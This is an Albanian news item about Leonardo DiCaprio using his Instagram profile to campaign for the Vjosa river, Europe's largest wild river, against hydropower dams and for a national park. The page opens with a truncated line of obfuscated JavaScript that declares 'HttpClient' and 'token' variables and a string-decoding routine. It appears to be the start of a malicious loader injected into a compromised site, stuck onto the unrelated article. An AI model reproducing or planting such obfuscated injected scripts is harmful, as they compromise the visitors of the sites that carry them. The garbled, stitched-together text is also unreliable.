;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Leonardo DiCaprio i vendosur të shpëtojë Vjosën e Shqipërisë

By

Aktori me famë botërore, Leonardo Dicaprio po vazhdon të bëjë thirrje për lumin Vjosa në Shqipëri duke kërkuar që të mbrohet ky lum siç e quan ai “zemra blu e Evropës”.

Leondardo ka ngritur sërish zërin për mbrojtjen e lumit Vjosa nga ndërtimi i hidrocentraleve.

Ai tani në profilin e tij në Instagram në pjesën “bio” të biografisë ka vendosur linkun e “Vjosa Forever” faqja për mbrojtjen e lumit të Shqipërisë dhe krijimin e “Parkut Nacional Vjosa që do të ishte i pari park i një lumi të egër në Evrope.

“Lumi Vjosa i Shqipërisë është lumi më i madh i egër në Evropë. Nga malet e Greqisë deri në Detin Adriatik në Shqipëri, ai shtrihet në 300 kilometra, plotësisht i lirë nga barrierat artificiale, si digat e hidrocentraleve. Lumenjtë dhe përrenjtë që janë degë të Vjosës janë shtëpia e më shumë se 1,100 specieve të botës së egër, shumë prej të cilave janë të kërcënuara”, shkruan ai ndër të tjera. /Prive.al

 

View this post on Instagram

 

A post shared by Leonardo DiCaprio (@leonardodicaprio)

Artikuj të ngjashëm